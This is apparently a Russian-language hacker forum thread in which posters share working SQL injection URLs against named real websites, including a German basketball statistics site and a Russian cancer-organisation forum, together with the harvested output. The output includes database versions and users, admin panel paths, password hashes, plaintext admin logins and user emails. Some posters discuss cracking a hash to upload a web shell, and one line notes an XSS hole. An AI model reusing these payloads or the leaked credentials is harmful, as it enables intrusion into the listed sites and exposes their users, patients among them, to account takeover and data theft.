alouettecanada.ca Code: http://www.alouettecanada.ca/press_releases-f.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
statistik.basketball-bundesliga.de HTML: http://statistik.basketball-bundesliga.de/print_player.php?liga_id=1&team_id=413+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/* HTML: http://statistik.basketball-bundesliga.de/print_player.php?liga_id=1&team_id=413+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/* USER:bblstats@localhost VERSION::4.1.11-Debian_4sarge7 DATABASE:usr_web1_1 Вот тут админка еще: HTML: http://statistik.basketball-bundesliga.de/admin/
mypspwebsite.com 4.1.21-standard: psp :itl@localhost root:42da70e829fb058d itl_safeboating0:14ed81343ed8ed5b mycms:042b624758e485a0 itl:26a3e0e614cf0724 accomm:5210de0d20737caa lynx:32335d666b6b535d ArthurJenkins001:6180cc7a02f27b63 licence:71801f1a6ca21bc2 tucantravel:5f42297b6482f1b4 toucan001:0dbe24ad0d0f6594 _____________________________________________ www.moriahhaggadah.com 5.0.32-Debian_7etch3-log:aistore:aistore@localhost _____________________________________________ www.traditionalhousedesign.ca 5.0.45-log:housedesign:housedesign@localhost
http://www.ugmk.info/?art=-1+union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user()),6,7,8,9/* 4.0.26-log/ugmk/ugmk@localhost тут же XSS в поиске <script>alert()</script> ----------------------------------------------------------------------------- http://www.uel.ru/newstext.asp?id=-1+or+1=@@version-- Microsoft SQL Server 7.00 - 7.00.1094 (Intel X86) May 29 2003 15:21:25 Copyright (c) 1988-2002 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) http://www.uel.ru/newstext.asp?id=-1+or+1=(select+db_name())-- uel http://www.uel.ru/newstext.asp?id=-1+or+1=(select+system_user)-- WWW\IUSR_WWW
www.aei.brookings.org HTML: http://www.aei.brookings.org/publications/abstract.php?pid=-296+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(version(),0x3a,user(),0x3a,database()),15,16,17,18,19/* 4.0.25-standard-log:[email protected]:aei_brookings
www.smolbibl.ru 5.0.45-community Admin:Андрей:5:dtkbrj,hbnfybz:[email protected]:Метелица login:Admin pass:dtkbrj,hbnfybz http://www.smolbibl.ru/admin.php но пароль не подходит ... не знаю что делать ((
http://soft.oszone.net HTML: http://soft.oszone.net/program.php?pid=-30+UNION+SELECT+1,2,3,4,5,6,7,8,9,concat(version(),0x3a,user(),0x3a,database()),11,12,13,14,15,16,17,18,19,20,21,22,23/* 4.1.22-log:bigmac_soft@localhost:bigmac_soft
http://www.europa.fm/ru/index.html?c=about&id=-1+union+select+1,2,3,4,concat_ws(0x2F,cast(version()+as+binary),cast(database()+as+binary),cast(user()+as+binary)),6,7,8/* 4.1.14-standard/europa/europa@localhost ----------------------------------------------------------------------------- art-catalog.ru http://www.picture.art-catalog.ru/artist.php?id_artist=-4+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5/* 4.1.22-log/artcata8_artcatalog/artcata8_Bos37ar@localhost http://www.picture.art-catalog.ru/artist.php?id_artist=-4+union+select+1,concat_ws(0x2F,user_login,user_password,email),3,4,5+from+users/* логин/пароль/мейл valent/valent46/[email protected]
SexSecrets.ru ^ ^ Code: http://sexsecrets.ru/index.php?r=menlogic&id=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4+--+ 5.0.26:sexsecrets_ru@localhost:sexsecrets_ru Таблицка: phpbb_users Столбцы: user_id username user_password Code: http://sexsecrets.ru/index.php?r=menlogic&id=-1+union+select+1,concat_ws(0x3a,user_id,username,user_password),3,4+from+phpbb_users+limit+1,1/* Code: 2:Admin:be245c9762fe4ae6f40bbf944e0de243
http://www.dovodchiki-dorma.ru/links/?cat=-1+union+select+user()/* Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION' http://www.tsaritsyno.ru/main.jsp?id=-1+order+by+3/*
www.onboard.ru Code: http://www.onboard.ru/resort/?id=-1+union+select+user()/* Code: http://s1912.zouo.ru/site.php?id=-1+union+select+user(),2,3/*
Эта запись ни о чем не говорит, ведь столбцов то - 4. Code: http://www.taniec.ilife.pl/para.php?id=-1+UNION+SELECT+1,2,3,concat(user(),0x3a,database(),0x3a,version())/* taniec_adner@localhost:taniec_taniec:4.1.22-standard
http://dctel.net/index.php?page=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4/* 4.0.23a-log/dctel/dctel_user@localhost ----------------------------------------------------------------------------- http://www.arbicon.ru/news/?id=-1+or+1=@@version-- Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 1) http://www.arbicon.ru/news/?id=-1+or+1=(select+db_name())-- portal http://www.arbicon.ru/news/?id=-1+or+1=(select+system_user)-- portal
http://www.archivespro.ru/index.php?news=-18+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9,10,11,12/* archive9_2@localhost:archive9_arhiv:4.1.22-log
2 159932 Посмотрел robots, по идее должна быть в /admin/, но там нету... Попробуй таблицы от форума. (phpbb_users) - Если подберешь пасс, то можешь залить шелл... Code: http://www.glukometr.ru/article.php?action=ViewArticle&ID=360+UNION+SELECT+1,concat(username,0x3a,user_password),3,4,5+from+gurujen_forum.phpbb_users/* Ольга:82e0839b64d121ef7154f2b8d5b27351:qween1
www.netoncology.ru - Союз Противораковых Организаций России Аж 4 таблицы с пользователями.... (вывод данных в первой строчке вверху) Forum_Users: Code: http://www.netoncology.ru/view.php?id=-506'+union+select+concat_ws(0x3a,NikName,EMail,Pass)+from+Forum_Users+limit+0,1/* Users: Code: http://www.netoncology.ru/view.php?id=-506'+union+select+concat_ws(0x3a,UserLogin,UserPwd)+from+Users+limit+0,1/* phpbb_patients_users: Code: http://www.netoncology.ru/view.php?id=-506'+union+select+concat_ws(0x3a,username,User_Password)+from+phpbb_patients_users+limit+1,1/* phpbb_specialists_users: Code: http://www.netoncology.ru/view.php?id=-506'+union+select+concat_ws(0x3a,username,User_Password)+from+phpbb_specialists_users+limit+1,1/* Все таблицы перебираем лимитом... Админка: http://netoncology.ru/admin/ login:admin pass:ghbdtn С наступающим=)